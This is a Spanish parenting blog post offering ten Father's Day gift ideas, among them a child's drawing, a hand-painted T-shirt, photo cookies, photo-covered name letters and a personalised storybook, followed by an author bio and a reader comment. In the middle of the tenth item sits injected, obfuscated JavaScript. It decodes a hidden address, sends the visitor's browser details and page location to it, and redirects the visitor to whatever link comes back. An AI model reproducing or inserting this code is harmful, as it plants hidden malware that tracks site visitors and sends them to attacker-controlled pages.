10 ideas para sorprender a papá

Como las ideas para regalar en el Día del Padre son infinitas, en este post traigo 10 propuestas para que escojas el regalo perfecto. Este año no hay excusas, hay que prepararle algo a papi sí o sí.

Cada año pensando qué hacer para el 19 de marzo. Yo intento (solo llevamos cinco) hacer algo diferente y original en cada ocasión, y como sé que muchas veces es difícil y navegamos por la red para dar con eso que sorprenda a la otra parte, aquí te cuento lo que he hecho otras veces por si puedes aprovechar la idea. Ah, ¡feliz día a todos!

1. Algo clásico
Es algo seguro, ¿sabes de lo que hablo, no?  Elena y yo ya estamos preparando un dibujo. Es idea y propuesta suya, así que no me puedo negar.

mamatieneunplan

2. Manualidad
A los papis siempre les gustan las cosas que hacen sus hijos y si ya tiene la nevera llena de folios con casas y nenes, ¿por qué no intentamos ir un paso más allá? El año pasado hicimos esta actividad tan sencilla. Colocas la mano de tu hijo en un papel, haces la forma de la misma y lo recortas. Luego, en una cartulina, escribes una frase y pegas las manos al lateral.

3. Papá, a la modaimage1-3
Esta es nuestra propuesta estrella, porque la estamos elaborando esta semana por las tardes. Me lo comentó mi amiga Inma hace un par de años y este, por fin, se la he copiado. Compra una camiseta blanca básica, pinturas no tóxicas y… ¡a crear! Las que nosotras hemos utilizado son de Dideco y son rotuladores para pintar sobre prendas. También está la opción de pinturas de dedos, pero en ese caso, no podrás lavar la camiseta.

4. ¡Todo muy dulce!
Esta idea la utilicé para un San Valentín, pero se puede customizar para el día del padre. ¡Son galletas con imágenes vuestras! Y se comen de verdad. Solo hace falta una foto de toda la familia o del protagonista con los niños, y solucionado. Podéis encargarlo online.

5. Súperlienzo para los padres más clásicos
Una foto de familia, o de los peques, o del papi, siempre gana cuando está ampliada. Si queréis darla un toque especial y disfrutarla todos los días, en Hofmann hacen unos lienzos que son una pasada.

mamatieneunplan

6. Su nombre más especial
Quinta propuesta y también con fotos. A todo el mundo que se lo cuento le encanta, y en este caso esta idea se la debo a mis amigas, que me lo hicieron por mi 40 cumpleaños. Seleccionaron un montón de fotos mías y las pegaron en las letras de mi nombre. Ahora las tengo en casa como sujeta libros. Estoy convencida que os lo pasaréis genial mamis y peques haciéndolo, y él no se lo espera. Son letras de papel mache. Las venden en tiendas de pinturas y decoración y en tiendas de manualidades o por internet. Se suelen pintar con pinturas tiza (chalk paint), se hacen craquelados, se forran con telas….

7. A vueltas con el nombreimage2
Y otra sorpresa con el nombre es hacerlo esta vez con pastillas de jabón. En el caso que muestro fue para el bautizo de mi hija la pequeña, pero al igual que con las opciones anteriores, creo que es una buena idea que puedes adecuar a tus necesidades. Es muy rápido, sencillo y su dueña es un encanto. Lo hablé todo con ella por whatapp y a última hora la pedí tres más y no tuve ningún problema.  E incluso le pedí uno con el nombre de la mayor y también me lo envío. ¡Muy recomendable! Para los padres más detallistas!

8. ¡Cuéntame un cuento!
¿Y si le regalamos a papá un cuento para que nos lo lea por las noches? Genial, pero ¿qué tal si el protagonista de la historia es él y sus niños? Más genial aún. Fue nuestro regalo hace dos años y acertamos, así que lo recomiendo también al 100%.

 9. Ganchillo
Un llavero o un marca páginas puede ser un regalo perfecto si se lo encargas a La Rana Midori. Su dueña, Bea, hace con agujas de ganchillo divertidos cerditos, búhos o cualquier otra forma animal para meter las llaves o marcar las páginas de su libro favorito. En casa estábamos dudando entre una cosa u otra.

 10. Y para terminar
Y si ninguna de estas ideas terminan de inspirarte o no van contigo y tu peque, siempre puedes recurrir a ponerte delante de la cámara y grabaros un vídeo gracioso. var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = “”; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}

Sobre Diana

Soy periodista, emprendedora, amante del teatro (sobre todo infantil) y de los buenos planes (en familia, en pareja, entre amigos, en solitario...). Un día, después de un montón de casualidades, decidí lanzarme a la aventura de poner en marcha mi propio proyecto profesional: Mamá tiene un Plan. Hoy, tengo dos peques (niña y niño) y muchas ilusiones, a los que dedico todo mi tiempo y energía. En el viaje me acompaña un hombre maravilloso (al que dedico menos tiempo del que me gustaría y quiero con locura) y una gran familia a la que adoro que hace posible que todo lo demás siga girando. @Diana_M_N

3 comentarios en “10 ideas para sorprender a papá

  1. Que ideas más geniales y las letras de papa repletas de momentos inolvidables es genial y el cuento me encanta como siempre me sorprendes . Un beso

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *